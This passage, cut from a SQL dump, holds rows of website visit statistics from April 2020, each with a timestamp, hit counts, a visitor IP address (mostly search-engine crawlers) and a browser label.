95101,1586145546,1,1,0,0,'66.249.64.24','chrome'),(495102,1586146089,1,1,0,0,'178.154.200.222','other'),(495103,1586146100,1,1,0,0,'66.249.64.25','chrome'),(495104,1586146220,2,2,0,0,'66.249.64.23','chrome'),(495105,1586147809,1,1,0,0,'62.205.134.182','other'),(495106,1586148017,1,1,0,0,'207.46.13.119','other'),(495107,1586148428,1,1,0,0,'66.249.64.23','chrome'),(495108,1586148687,8,8,0,0,'94.130.9.183','other'),(495109,1586148972,3,3,0,0,'52.14.123.82','chrome'),(495110,1586149389,8,8,0,0,'77.120.98.235','other'),(495111,1586149408,1,1,0,0,'66.249.64.24','chrome'),(495112,1586149598,7,7,0,0,'94.130.9.183','other'),(495113,1586150173,1,1,0,0,'66.249.64.25','chrome'),(495114,1586150181,1,1,0,0,'207.46.13.119','other'),(495115,1586150522,8,8,0,0,'94.130.9.183','other'),(495116,1586151117,2,2,0,0,'66.249.64.25','chrome'),(495117,1586151444,6,6,0,0,'94.130.9.183','other'),(495118,1586151745,1,1,0,0,'213.180.203.16','other'),(495119,1586151906,1,1,0,0,'8.29.198.27','other'),(495120,1586152446,1,1,0,0,'66.249.64.24','chrome'),(495121,1586152523,1,1,0,0,'8.29.198.26','other'),(495122,1586152626,1,1,0,0,'207.46.13.119','other'),(495123,1586153578,1,1,0,0,'207.46.13.119','other'),(495124,1586153968,1,0,1,0,'207.46.13.5',''),(495125,1586154213,1,1,0,0,'46.211.132.70','other'),(495126,1586154704,1,1,0,0,'178.154.200.222','other'),(495127,1586154798,1,1,0,0,'66.249.64.25','chrome'),(495128,1586155319,2,2,0,0,'91.196.178.68','chrome'),(495129,1586155764,1,0,1,0,'66.249.64.24',''),(495130,1586156038,1,1,0,0,'178.154.200.222','other'),(495131,1586156792,1,1,0,0,'66.249.64.25','chrome'),(495132,1586158289,1,1,0,0,'178.154.200.222','other'),(495133,1586159658,1,1,0,0,'178.154.200.222','other'),(495134,1586159785,1,1,0,0,'62.109.22.217','chrome'),(495135,1586160147,1,1,0,0,'141.101.1.47','firefox'),(495136,1586161053,3,3,0,0,'66.249.64.23','chrome'),(495137,1586162079,1,1,0,0,'66.249.64.24','chrome'),(495138,1586162108,2,2,0,0,'66.249.64.25','chrome'),(495139,1586162736,1,1,0,0,'8.29.198.25','other'),(495140,1586163094,2,2,0,0,'62.205.148.231','chrome'),(495141,1586163351,1,1,0,0,'8.29.198.26','other'),(495142,1586163445,1,1,0,0,'51.158.190.233','other'),(495143,1586163495,2,2,0,0,'173.252.111.15','other'),(495144,1586163500,1,1,0,0,'173.252.111.3','other'),(495145,1586163520,1,1,0,0,'173.252.111.16','other'),(495147,1586163549,1,1,0,0,'173.252.111.5','other'),(495148,1586163550,1,1,0,0,'173.252.111.11','other'),(495150,1586163603,3,3,0,0,'66.249.64.25','chrome'),(495151,1586163605,2,2,0,0,'66.249.64.23','chrome'),(495152,1586164864,1,1,0,0,'66.249.64.23','chrome'),(495153,1586164934,2,2,0,0,'66.249.64.25','chrome'),(495154,1586165194,1,1,0,0,'92.112.125.79','chrome'),(495155,1586165443,8,8,0,0,'77.120.98.235','other'),(495156,1586165894,1,1,0,0,'37.53.226.237','chrome'),(495157,1586166272,1,1,0,0,'66.249.70.36','chrome'),(495158,1586166464,1,1,0,0,'13.58.121.40','chrome'),(495159,1586166498,1,1,0,0,'91.196.178.134','chrome'),(495160,1586166560,1,1,0,0,'91.196.178.73','chrome'),(495161,1586166744,1,1,0,0,'66.249.64.25','chrome'),(495162,1586167493,2,2,0,0,'207.46.13.208','other'),(495163,1586167790,2,2,0,0,'66.249.64.23','chrome'),(495164,1586168182,1,1,0,0,'66.249.70.33','chrome'),(495165,1586168283,1,1,0,0,'66.249.64.25','chrome'),(495166,1586168755,1,1,0,0,'66.249.64.23','chrome'),(495167,1586169419,1,1,0,0,'66.249.64.25','chrome'),(495168,1586169670,1,1,0,0,'66.249.64.23','chrome'),(495169,1586169865,1,1,0,0,'91.196.178.149','firefox'),(495170,1586169916,1,0,1,0,'207.46.13.5',''),(495171,1586170265,1,1,0,0,'66.249.70.38','chrome'),(495172,1586170767,1,1,0,0,'66.249.64.24','chrome'),(495173,1586172281,1,1,0,0,'92.112.105.39','chrome'),(495174,1586172505,1,1,0,0,'178.154.200.220','other'),(495175,1586172557,1,1,0,0,'66.249.64.24','chrome'),(495176,1586172626,1,1,0,0,'178.54.207.139','chrome'),(495177,1586173272,2,2,0,0,'207.46.13.208','other'),(495178,1586173564,1,1,0,0,'8.29.198.25','other'),(495179,1586173845,1,1,0,0,'109.74.154.72','chrome'),(495180,1586174180,1,1,0,0,'8.29.198.27','other'),(495181,1586174508,3,3,0,0,'66.249.64.24','chrome'),(495182,1586174517,1,1,0,0,'66.249.64.23','chrome'),(495183,1586175382,1,1,0,0,'66.249.64.25','chrome'),(495184,1586175429,1,1,0,0,'207.46.13.208','other'),(495185,1586175483,1,1,0,0,'66.249.64.24','chrome'),(495186,1586175776,1,1,0,0,'178.92.172.179','chrome'),(495187,1586176473,1,1,0,0,'91.196.178.76','chrome'),(495188,1586176772,1,1,0,0,'178.154.200.236','other'),(495189,1586176885,1,1,0,0,'131.220.6.152','chrome'),(495190,1586177317,1,1,0,0,'207.46.13.208','other'),(495191,1586177370,1,1,0,0,'91.196.178.3','chrome'),(495192,1586177391,1,1,0,0,'66.249.64.23','chrome'),(495193,1586178258,2,2,0,0,'66.249.64.24','chrome'),(495194,1586178359,1,1,0,0,'66.249.64.25','chrome'),(495195,1586179568,1,1,0,0,'176.118.166.51','chrome'),(495196,1586179899,1,1,0,0,'138.246.253.15','chrome'),(495197,1586180058,2,2,0,0,'66.249.64.24','chrome'),(495198,1586180281,1,1,0,0,'91.196.178.182','chrome'),(495199,1586181014,1,1,0,0,'66.249.64.23','chrome'),(495200,1586181089,8,8,0,0,'77.120.98.235','other'),(495201,1586181092,1,1,0,0,'5.58.166.203','chrome'),(495202,1586181215,1,1,0,0,'66.249.64.25','chrome'),(495203,1586181412,1,1,0,0,'66.249.70.38','chrome'),(495204,1586183125,2,2,0,0,'66.249.64.24','chrome'),(495205,1586183407,2,2,0,0,'66.249.64.25','chrome'),(495206,1586183765,1,1,0,0,'207.46.13.5','other'),(495207,1586183930,1,1,0,0,'66.249.64.23','chrome'),(495208,1586184091,1,1,0,0,'66.249.64.24','chrome'),(495209,1586184210,1,1,0,0,'178.154.200.241','other'),(495210,1586184399,2,2,0,0,'8.29.198.27','other'),(495211,1586184782,1,1,0,0,'213.180.203.16','other'),(495212,1586185187,1,1,0,0,'176.37.49.24','chrome'),(495213,1586185408,1,1,0,0,'66.249.70.33','chrome'),(495214,1586185559,1,1,0,0,'66.249.64.23','chrome'),(495215,1586185697,1,1,0,0,'88.99.2.203','other'),(495217,1586185699,7,7,0,0,'136.243.70.68','other'),(495218,1586185830,1,1,0,0,'66.249.64.24','chrome'),(495219,1586186026,2,2,0,0,'207.46.13.208','other'),(495220,1586186539,1,1,0,0,'213.180.203.16','other'),(495221,1586187554,1,1,0,0,'213.180.203.16','other'),(495222,1586188341,1,1,0,0,'178.154.200.222','other'),(495223,1586188586,1,1,0,0,'66.249.70.38','chrome'),(495224,1586188640,3,3,0,0,'213.180.203.16','other'),(495225,1586188867,1,1,0,0,'66.249.70.36','chrome'),(495226,1586188938,1,1,0,0,'66.249.64.25','chrome'),(495227,1586189471,1,1,0,0,'66.249.64.23','chrome'),(495228,1586189551,2,2,0,0,'66.249.64.24','chrome'),(495229,1586190275,1,1,0,0,'66.249.64.25','chrome'),(495230,1586190345,3,3,0,0,'207.46.13.208','other'),(495231,1586190448,2,2,0,0,'178.154.200.222','other'),(495232,1586190530,1,1,0,0,'46.48.13.161','chrome'),(495233,1586191261,1,1,0,0,'173.252.111.11','other'),(495234,1586191262,1,1,0,0,'173.252.111.17','other'),(495237,1586191264,2,2,0,0,'173.252.111.2','other'),(495239,1586191693,1,1,0,0,'213.180.203.16','other'),(495240,1586192037,1,1,0,0,'178.154.200.220','other'),(495241,1586192609,3,3,0,0,'66.249.64.24','chrome'),(495242,1586192651,1,1,0,0,'66.249.70.36','chrome'),(495243,1586192771,1,1,0,0,'207.46.13.5','other'),(495244,1586192862,2,2,0,0,'207.46.13.208','other'),(495245,1586193292,1,1,0,0,'66.249.64.25','chrome'),(495246,1586193333,1,1,0,0,'91.196.178.27','chrome'),(495247,1586193696,1,1,0,0,'178.154.200.222','other'),(495248,1586194056,2,2,0,0,'66.249.64.24','chrome'),(495249,1586194260,2,2,0,0,'207.46.13.5','other'),(495250,1586194689,1,1,0,0,'66.249.64.23','chrome'),(495251,1586195118,1,1,0,0,'178.154.200.220','other'),(495252,1586195122,1,1,0,0,'91.196.178.27','chrome'),(495253,1586195233,1,1,0,0,'8.29.198.26','other'),(495254,1586195367,1,1,0,0,'178.154.200.222','other'),(495255,1586195407,1,1,0,0,'91.196.178.51','other'),(495256,1586195506,8,8,0,0,'77.120.98.235','other'),(495257,1586195843,1,1,0,0,'8.29.198.27','other'),(495258,1586196134,1,1,0,0,'178.154.200.196','chrome'),(495259,1586196300,1,1,0,0,'178.154.200.234','other'),(495260,1586196308,2,2,0,0,'66.249.64.23','chrome'),(495261,1586196899,1,1,0,0,'54.36.149.6','other'),(495262,1586197229,1,1,0,0,'54.36.149.87','other'),(495263,1586197730,1,1,0,0,'80.95.45.89','chrome'),(495264,1586198591,1,1,0,0,'66.249.64.23','chrome'),(495265,1586198822,1,1,0,0,'91.196.178.187','chrome'),(495266,1586198883,2,2,0,0,'66.249.64.25','chrome'),(495267,1586200227,1,1,0,0,'178.154.200.222','other'),(495268,1586200563,1,1,0,0,'54.36.149.41','other'),(495269,1586200570,1,1,0,0,'91.196.178.187','chrome'),(495270,1586200804,1,1,0,0,'54.36.149.16','other'),(495271,1586200875,1,1,0,0,'54.36.149.54','other'),(495272,1586201156,2,2,0,0,'207.46.13.243','other'),(495273,1586201185,1,1,0,0,'178.154.200.236','other'),(495274,1586202003,1,1,0,0,'54.36.149.94','other'),(495275,1586203130,1,1,0,0,'66.249.64.23','chrome'),(495276,1586203614,1,1,0,0,'66.249.70.33','chrome'),(495277,1586205051,3,2,1,0,'66.249.64.23',''),(495278,1586205097,2,2,0,0,'95.213.141.126','opera'),(495279,1586205352,1,1,0,0,'66.249.64.25','chrome'),(495280,1586205895,2,2,0,0,'66.249.64.23','chrome'),(495281,1586205912,1,1,0,0,'178.154.200.222','other'),(495282,1586206060,1,1,0,0,'8.29.198.25','other'),(495283,1586206513,1,1,0,0,'66.249.64.24','chrome'),(495284,1586206674,1,1,0,0,'8.29.198.27','other'),(495285,1586207632,1,1,0,0,'213.180.203.16','other'),(495286,1586208208,3,3,0,0,'66.249.64.23','chrome'),(495287,1586209270,1,1,0,0,'66.249.64.24','chrome'),(495288,1586209425,1,1,0,0,'66.249.64.25','chrome'),(495289,1586209668,8,8,0,0,'77.120.98.235','other'),(495290,1586209721,1,1,0,0,'178.154.200.110','other'),(495291,1586210340,2,2,0,0,'66.249.64.25','chrome'),(495292,1586210531,1,1,0,0,'66.249.64.23','chrome'),(495293,1586210559,1,1,0,0,'54.36.149.58','other'),(495294,1586210759,1,1,0,0,'54.36.149.106','other'),(495295,1586211393,1,1,0,0,'54.36.149.96','other'),(495296,1586211397,1,1,0,0,'66.249.64.25','chrome'),(495297,1586211758,1,1,0,0,'66.249.64.23','chrome'),(495298,1586212592,1,1,0,0,'207.46.13.243','other'),(495299,1586215300,1,1,0,0,'66.249.64.23','chrome'),(495300,1586215827,1,1,0,0,'207.46.13.5','other'),(495301,1586216897,1,1,0,0,'8.29.198.25','other'),(495302,1586217217,1,1,0,0,'54.36.149.81','other'),(495303,1586217242,1,1,0,0,'66.249.70.36','chrome'),(495304,1586217305,1,1,0,0,'62.205.134.182','other'),(495305,1586217498,1,1,0,0,'8.29.198.27','other'),(495306,1586218053,1,1,0,0,'66.249.64.23','chrome'),(495307,1586220193,1,1,0,0,'54.36.149.93','other'),(495308,1586220949,1,1,0,0,'66.249.70.38','chrome'),(495309,1586220981,1,1,0,0,'54.36.149.73','other'),(495310,1586222007,1,1,0,0,'35.183.95.48','firefox'),(495311,1586222494,1,1,0,0,'66.249.64.25','chrome'),(495312,1586223372,1,1,0,0,'66.249.70.38','chrome'),(495313,1586224821,2,2,0,0,'66.249.64.25','chrome'),(495314,1586225318,1,1,0,0,'207.46.13.5','other'),(495316,1586226115,8,8,0,0,'77.120.98.235','other'),(495317,1586226228,3,3,0,0,'66.249.64.23','chrome'),(495318,1586226235,1,1,0,0,'66.249.64.24','chrome'),(495319,1586226661,2,2,0,0,'66.249.64.25','chrome'),(495320,1586226765,1,1,0,0,'54.36.149.45','other'),(495321,1586226997,1,1,0,0,'54.36.149.19','other'),(495322,1586227393,1,1,0,0,'104.206.128.42','other'),(495323,1586227735,1,1,0,0,'8.29.198.25','other'),(495324,1586228239,1,1,0,0,'178.159.37.88','chrome'),(495325,1586228327,1,1,0,0,'8.29.198.26','other'),(495326,1586228786,1,1,0,0,'54.36.149.55','other'),(495327,1586229230,1,1,0,0,'54.36.149.82','other'),(495328,1586230200,1,1,0,0,'66.249.64.23','chrome'),(495329,1586230341,1,1,0,0,'66.249.64.25','chrome'),(495330,1586230448,2,2,0,0,'66.249.64.24','chrome'),(495331,1586231252,1,1,0,0,'54.36.149.62','other'),(495332,1586231870,2,2,0,0,'66.249.64.25','chrome'),(495333,1586232280,1,1,0,0,'23.129.64.207','chrome'),(495334,1586234089,1,1,0,0,'54.36.149.33','other'),(495335,1586234375,1,1,0,0,'62.205.134.182','other'),(495336,1586234924,1,1,0,0,'66.249.64.24','chrome'),(495337,1586235047,1,0,1,0,'66.249.70.38',''),(495338,1586235435,1,1,0,0,'207.46.13.5','other'),(495339,1586236241,1,1,0,0,'66.249.64.24','chrome'),(495340,1586236469,1,1,0,0,'54.36.149.28','other'),(495341,1586238347,1,1,0,0,'66.249.64.25','chrome'),(495342,1586238407,1,1,0,0,'66.249.64.24','chrome'),(495343,1586238566,2,2,0,0,'8.29.198.27','other'),(495344,1586238635,3,3,0,0,'91.196.178.183','chrome'),(495345,1586238664,1,1,0,0,'79.137.143.26','chrome'),(495346,1586239772,1,1,0,0,'91.196.178.183','chrome'),(495347,1586240629,1,1,0,0,'193.148.18.251','chrome'),(495348,1586240822,8,8,0,0,'77.120.98.235','other'),(495349,1586241266,1,1,0,0,'91.196.178.183','chrome'),(495350,1586243023,1,1,0,0,'66.249.64.23','chrome'),(495351,1586243757,1,1,0,0,'66.249.64.24','chrome'),(495352,1586243968,1,1,0,0,'66.249.64.25','chrome'),(495353,1586244261,1,1,0,0,'54.36.149.87','other'),(495354,1586245255,2,2,0,0,'66.249.64.24','chrome'),(495355,1586245325,2,2,0,0,'66.249.64.25','chrome'),(495356,1586245739,2,2,0,0,'66.249.64.23','chrome'),(495357,1586245860,1,1,0,0,'54.36.149.80','other'),(495358,1586246813,1,1,0,0,'66.249.64.23','chrome'),(495359,1586247054,1,1,0,0,'66.249.64.24','chrome'),(495360,1586247329,1,1,0,0,'91.196.178.183','chrome'),(495361,1586247963,1,1,0,0,'94.153.26.240','chrome'),(495362,1586248323,1,1,0,0,'91.196.178.183','chrome'),(495363,1586248502,1,1,0,0,'66.249.64.25','chrome'),(495364,1586248733,1,1,0,0,'66.249.64.23','chrome'),(495365,1586249045,1,1,0,0,'91.196.179.134','chrome'),(495366,1586249128,1,1,0,0,'54.36.149.105','other'),(495367,1586249145,1,1,0,0,'66.249.64.24','chrome'),(495368,1586249398,1,1,0,0,'8.29.198.27','other'),(495369,1586249988,1,1,0,0,'8.29.198.26','other'),(495370,1586250201,1,1,0,0,'66.249.70.36','chrome'),(495371,1586250945,1,1,0,0,'66.249.64.23','chrome'),(495372,1586252020,1,1,0,0,'78.152.161.122','firefox'),(495373,1586252172,1,1,0,0,'66.249.70.33','chrome'),(495374,1586252242,1,1,0,0,'66.249.64.23','chrome'),(495375,1586252252,1,1,0,0,'66.249.64.24','chrome'),(495376,1586252280,1,1,0,0,'91.196.178.187','chrome'),(495377,1586252477,1,1,0,0,'157.55.39.206','other'),(495378,1586252990,1,1,0,0,'18.209.212.169','chrome'),(495379,1586254034,1,1,0,0,'66.249.64.25','chrome'),(495380,1586254090,8,8,0,0,'77.120.98.235','other'),(495381,1586254331,1,1,0,0,'66.249.64.24','chrome'),(495382,1586254422,1,1,0,0,'66.249.64.23','chrome'),(495383,1586254454,1,1,0,0,'54.36.149.48','other'),(495384,1586254961,1,1,0,0,'157.55.39.206','other'),(495385,1586255073,1,1,0,0,'91.209.11.236','other'),(495386,1586255355,1,1,0,0,'66.249.64.23','chrome'),(495387,1586255389,1,1,0,0,'66.249.70.33','chrome'),(495388,1586255401,1,1,0,0,'66.249.70.38','chrome'),(495389,1586255423,1,1,0,0,'66.249.64.24','chrome'),(495390,1586255526,1,1,0,0,'66.249.70.36','chrome'),(495391,1586256142,1,0,1,0,'66.249.64.25',''),(495392,1586256532,2,2,0,0,'66.249.64.23','chrome'),(495393,1586257257,1,1,0,0,'95.133.189.23','chrome'),(495394,1586258176,1,1,0,0,'66.249.70.36','chrome'),(495395,1586258607,2,2,0,0,'66.249.64.25','chrome'),(495396,1586259645,1,1,0,0,'37.53.228.153','chrome'),(495397,1586259717,1,1,0,0,'104.140.188.10','other'),(495398,1586260048,3,3,0,0,'66.249.64.23','chrome'),(495399,1586260116,1,1,0,0,'157.55.39.206','other'),(495400,1586260228,1,1,0,0,'8.29.198.25','other'),(495401,1586260460,1,1,0,0,'54.36.149.80','other'),(495402,1586260745,1,1,0,0,'91.196.178.76','chrome'),(495403,1586260815,1,1,0,0,'8.29.198.27','other'),(495404,1586261152,1,1,0,0,'37.54.16.169','chrome'),(495405,1586261245,1,1,0,0,'46.211.33.25','chrome'),(495406,1586261584,1,1,0,0,'91.196.178.183','chrome'),(495407,1586261719,1,1,0,0,'66.249.64.24','chrome'),(495408,1586261847,2,2,0,0,'66.249.64.23','chrome'),(495409,1586261991,1,1,0,0,'66.249.64.25','chrome'),(495410,1586262313,1,1,0,0,'37.54.16.169','chrome'),(495411,1586262558,1,1,0,0,'131.220.6.152','chrome'),(495412,1586262653,1,1,0,0,'109.74.154.72','chrome'),(495413,1586262902,1,1,0,0,'91.196.178.183','chrome'),(495414,1586262917,1,1,0,0,'13.66.139.0','other'),(495415,1586263072,1,1,0,0,'91.196.177.46','chrome'),(495416,1586263075,2,2,0,0,'66.249.64.24','chrome'),(495417,1586263330,1,1,0,0,'157.55.39.206','other'),(495419,1586263758,1,1,0,0,'54.208.102.37','other'),(495420,1586263760,1,1,0,0,'107.21.1.8','other'),(495421,1586264087,1,1,0,0,'37.54.16.169','chrome'),(495422,1586264491,1,1,0,0,'91.196.178.183','chrome'),(495423,1586264799,5,5,0,0,'66.249.64.23','chrome'),(495424,1586265026,3,3,0,0,'66.249.64.24','chrome'),(495425,1586265523,1,0,1,0,'157.55.39.206',''),(495426,1586265580,1,1,0,0,'66.249.70.36','chrome'),(495427,1586266265,1,1,0,0,'66.249.64.23','chrome'),(495428,1586266610,1,1,0,0,'88.155.67.216','chrome'),(495429,1586266672,4,4,0,0,'66.249.64.24','chrome'),(495430,1586266752,2,2,0,0,'66.249.64.25','chrome'),(495431,1586266874,1,1,0,0,'91.196.178.184','chrome'),(495432,1586266929,1,1,0,0,'66.249.70.38','chrome'),(495433,1586267872,1,1,0,0,'66.249.64.25','chrome'),(495434,1586268308,1,1,0,0,'66.249.64.23','chrome'),(495435,1586268714,1,1,0,0,'77.74.177.114','chrome'),(495436,1586268747,2,2,0,0,'66.249.64.24','chrome'),(495437,1586269000,1,1,0,0,'157.55.39.206','other'),(495438,1586269432,1,1,0,0,'91.196.178.183','chrome'),(495439,1586269664,3,3,0,0,'66.249.64.24','chrome'),(495440,1586269720,8,8,0,0,'77.120.98.235','other'),(495441,1586270292,1,1,0,0,'66.249.70.38','chrome'),(495442,1586270306,1,1,0,0,'66.249.70.36','chrome'),(495443,1586270315,1,1,0,0,'66.249.70.33','chrome'),(495444,1586270513,1,1,0,0,'77.74.177.114','chrome'),(495445,1586270977,2,2,0,0,'66.249.64.23','chrome'),(495446,1586271062,2,2,0,0,'8.29.198.27','other'),(495447,1586271409,1,1,0,0,'157.55.39.242','other'),(495448,1586271429,2,2,0,0,'157.55.39.206','other'),(495449,1586271537,1,1,0,0,'66.249.70.38','chrome'),(495450,1586271860,1,1,0,0,'66.249.64.25','chrome'),(495451,1586271916,2,2,0,0,'66.249.64.24','chrome'),(495452,1586273320,1,1,0,0,'66.249.70.33','chrome'),(495453,1586273501,2,2,0,0,'66.249.64.23','chrome'),(495454,1586273784,2,2,0,0,'66.249.64.24','chrome'),(495455,1586273829,1,1,0,0,'66.249.64.25','chrome'),(495456,1586274049,2,2,0,0,'157.55.39.242','other'),(495457,1586274283,1,1,0,0,'157.55.39.206','other'),(495458,1586274299,1,1,0,0,'66.249.70.38','chrome'),(495459,1586274780,1,1,0,0,'66.249.64.24','chrome'),(495460,1586274961,2,2,0,0,'66.249.64.23','chrome'),(495461,1586275048,1,1,0,0,'91.196.178.27','chrome'),(495462,1586275179,2,2,0,0,'157.55.39.242','other'),(495463,1586276115,1,1,0,0,'66.249.64.24','chrome'),(495464,1586276541,1,1,0,0,'66.249.64.23','chrome'),(495465,1586276592,1,1,0,0,'173.252.111.24','other'),(495466,1586276593,1,1,0,0,'173.252.111.11','other'),(495469,1586276892,1,1,0,0,'66.249.64.25','chrome'),(495470,1586277367,1,1,0,0,'207.46.13.193','other'),(495471,1586277379,1,1,0,0,'46.211.61.17','chrome'),(495472,1586278007,1,1,0,0,'37.55.150.199','chrome'),(495473,1586278216,1,0,1,0,'66.249.70.36',''),(495474,1586278337,1,1,0,0,'91.196.178.187','chrome'),(495475,1586278399,4,4,0,0,'66.249.64.24','chrome'),(495476,1586278542,2,2,0,0,'66.249.64.25','chrome'),(495477,1586278817,1,1,0,0,'54.36.149.0','other'),(495478,1586279024,1,1,0,0,'66.249.70.38','chrome'),(495479,1586279647,1,1,0,0,'54.36.149.17','other'),(495480,1586279732,1,1,0,0,'91.196.178.150','chrome'),(495481,1586279807,1,1,0,0,'178.154.200.222','other'),(495482,1586279811,1,1,0,0,'66.249.70.33','chrome'),(495483,1586280336,2,2,0,0,'66.249.64.24','chrome'),(495484,1586280405,1,1,0,0,'66.249.64.23','chrome'),(495485,1586281067,1,1,0,0,'66.249.70.36','chrome'),(495486,1586281191,2,2,0,0,'66.249.64.25','chrome'),(495487,1586281412,3,3,0,0,'66.249.64.24','chrome'),(495488,1586281413,2,2,0,0,'66.249.64.23','chrome'),(495489,1586281897,2,2,0,0,'8.29.198.26','other'),(495490,1586282374,2,2,0,0,'66.249.64.25','chrome'),(495491,1586282510,2,2,0,0,'66.249.64.24','chrome'),(495492,1586282544,1,1,0,0,'66.249.64.23','chrome'),(495493,1586283795,1,1,0,0,'66.249.64.25','chrome'),(495494,1586284058,1,1,0,0,'66.249.64.24','chrome'),(495495,1586284059,8,8,0,0,'77.120.98.235','other'),(495496,1586285176,1,1,0,0,'66.249.64.24','chrome'),(495497,1586285795,1,1,0,0,'173.252.111.20','other'),(495498,1586286162,1,1,0,0,'66.249.64.23','chrome'),(495499,1586286397,1,1,0,0,'66.249.64.25','chrome'),(495500,1586286497,1,1,0,0,'88.99.2.203','other'),(495501,1586286499,7,7,0,0,'136.243.70.68','other'),(495502,1586286733,2,2,0,0,'178.154.200.222','other'),(495503,1586286933,1,1,0,0,'157.55.39.206','other'),(495504,1586287661,1,1,0,0,'91.196.178.73','chrome'),(495505,1586287699,1,1,0,0,'66.249.64.25','chrome'),(495506,1586287729,1,1,0,0,'178.154.200.222','other'),(495507,1586287897,3,3,0,0,'66.249.64.23','chrome'),(495508,1586288038,1,1,0,0,'104.206.128.18','other'),(495509,1586288319,1,1,0,0,'118.31.111.216','firefox'),(495510,1586288786,1,1,0,0,'66.249.64.25','chrome'),(495511,1586289213,1,1,0,0,'178.154.200.222','other'),(495512,1586289332,1,1,0,0,'213.180.203.142','other'),(495513,1586289448,1,1,0,0,'66.249.64.24','chrome'),(495514,1586290528,1,1,0,0,'66.249.64.25','chrome'),(495515,1586290705,3,3,0,0,'66.249.64.24','chrome'),(495516,1586291451,1,1,0,0,'66.249.70.38','chrome'),(495517,1586291604,1,1,0,0,'66.249.70.33','chrome'),(495518,1586291632,2,2,0,0,'66.249.64.25','chrome'),(495519,1586291823,1,1,0,0,'178.154.200.196','other'),(495520,1586291909,1,1,0,0,'66.249.64.24','chrome'),(495521,1586292544,1,1,0,0,'157.55.39.206','other'),(495522,1586292580,1,1,0,0,'130.180.212.83','chrome'),(495523,1586292729,2,2,0,0,'8.29.198.27','other'),(495524,1586292900,1,1,0,0,'66.249.64.25','chrome'),(495525,1586293324,2,2,0,0,'66.249.64.23','chrome'),(495526,1586293445,1,1,0,0,'178.154.200.67','other'),(495527,1586293743,1,1,0,0,'178.154.200.12','other'),(495528,1586294367,1,0,1,0,'207.46.13.234',''),(495529,1586294620,5,5,0,0,'66.249.64.24','chrome'),(495530,1586294952,2,2,0,0,'66.249.64.23','chrome'),(495531,1586295208,2,2,0,0,'66.249.70.36','chrome'),(495532,1586295457,1,1,0,0,'66.249.70.38','chrome'),(495533,1586295565,1,1,0,0,'66.249.70.33','chrome'),(495534,1586296899,3,3,0,0,'66.249.64.23','chrome'),(495535,1586297144,1,1,0,0,'66.249.64.24','chrome'),(495536,1586297217,2,2,0,0,'66.249.64.25','chrome'),(495537,1586297268,1,1,0,0,'178.154.200.47','other'),(495538,1586297740,2,2,0,0,'66.249.70.38','chrome'),(495539,1586297817,1,1,0,0,'66.249.70.33','chrome'),(495540,1586298237,4,3,1,0,'66.249.64.25',''),(495541,1586299875,1,1,0,0,'66.249.64.23','chrome'),(495542,1586299967,2,2,0,0,'66.249.64.24','chrome'),(495543,1586301049,2,2,0,0,'207.46.13.119','other'),(495544,1586301094,8,8,0,0,'77.120.98.235','other'),(495545,1586301446,1,1,0,0,'157.55.39.206','other'),(495546,1586301569,1,1,0,0,'66.249.64.25','chrome'),(495547,1586301625,1,1,0,0,'66.249.70.33','chrome'),(495548,1586301753,1,1,0,0,'178.154.200.220','other'),(495549,1586302107,3,3,0,0,'66.249.64.23','chrome'),(495550,1586302848,1,1,0,0,'66.249.64.24','chrome'),(495551,1586303216,1,1,0,0,'66.249.64.25','chrome'),(495552,1586303561,2,2,0,0,'8.29.198.27','other'),(495553,1586303610,1,1,0,0,'157.55.39.206','other'),(495554,1586303705,1,1,0,0,'62.205.134.182','other'),(495555,1586305173,2,2,0,0,'72.13.62.25','other'),(495556,1586305191,1,1,0,0,'178.154.200.236','other'),(495557,1586305615,2,2,0,0,'66.249.70.36','chrome'),(495558,1586306013,3,3,0,0,'66.249.64.23','chrome'),(495559,1586306922,1,1,0,0,'66.249.70.33','chrome'),(495560,1586307126,1,0,1,0,'157.55.39.206',''),(495561,1586307409,1,1,0,0,'66.249.64.23','chrome'),(495562,1586308534,1,0,1,0,'157.55.39.206',''),(495563,1586309733,1,1,0,0,'178.154.200.222','other'),(495564,1586311000,1,1,0,0,'207.46.13.119','other'),(495565,1586311018,2,2,0,0,'52.221.180.193','other'),(495566,1586311204,1,1,0,0,'178.154.200.185','other'),(495567,1586311433,1,1,0,0,'66.249.70.38','chrome'),(495568,1586311627,1,1,0,0,'44.233.199.185','other'),(495569,1586312025,1,1,0,0,'91.196.178.80','chrome'),(495570,1586312338,1,1,0,0,'66.249.70.38','chrome'),(495571,1586313012,1,1,0,0,'213.180.203.148','other'),(495572,1586313622,1,1,0,0,'46.211.48.183','chrome'),(495573,1586313655,1,1,0,0,'66.249.70.33','chrome'),(495574,1586313669,1,1,0,0,'66.249.64.24','chrome'),(495575,1586314307,3,3,0,0,'66.249.64.23','chrome'),(495576,1586314392,2,2,0,0,'8.29.198.25','other'),(495577,1586314647,1,1,0,0,'66.249.70.38','chrome'),(495578,1586314817,1,1,0,0,'66.249.64.25','chrome'),(495579,1586314853,1,1,0,0,'157.55.39.206','other'),(495580,1586315029,1,1,0,0,'46.211.48.183','chrome'),(495581,1586315111,1,1,0,0,'66.249.64.24','chrome'),(495582,1586316068,2,2,0,0,'66.249.64.24','chrome'),(495583,1586316140,1,1,0,0,'207.46.13.119','other'),(495584,1586316520,8,8,0,0,'77.120.98.235','other'),(495585,1586316998,1,1,0,0,'95.216.96.242','other'),(495586,1586317359,1,1,0,0,'178.154.200.236','other'),(495587,1586318173,2,2,0,0,'66.249.64.25','chrome'),(495588,1586318229,1,1,0,0,'66.249.64.24','chrome'),(495589,1586318382,2,2,0,0,'66.249.70.33','chrome'),(495590,1586318632,1,1,0,0,'209.17.96.226','other'),(495591,1586318836,1,1,0,0,'213.180.203.146','other'),(495592,1586320234,1,1,0,0,'178.154.200.176','other'),(495593,1586320236,1,1,0,0,'213.180.203.122','other'),(495594,1586320262,1,1,0,0,'157.55.39.206','other'),(495595,1586320799,1,1,0,0,'62.205.134.182','other'),(495596,1586320867,1,1,0,0,'213.180.203.173','other'),(495597,1586321495,2,2,0,0,'157.55.39.206','other'),(495598,1586321710,1,1,0,0,'66.249.64.25','chrome'),(495599,1586322264,3,3,0,0,'66.249.64.24','chrome'),(495600,1586322366,1,1,0,0,'66.249.64.23','chrome'),(495601,1586323070,1,1,0,0,'178.154.200.234','other'),(495602,1586323684,1,1,0,0,'66.249.64.24','chrome'),(495603,1586323993,1,1,0,0,'91.196.178.52','chrome'),(495604,1586324031,1,1,0,0,'31.13.103.4','other'),(495605,1586324292,1,1,0,0,'157.55.39.55','other'),(495606,1586324402,2,2,0,0,'91.196.178.69','chrome'),(495607,1586324533,1,1,0,0,'178.154.200.12','other'),(495608,1586324693,1,1,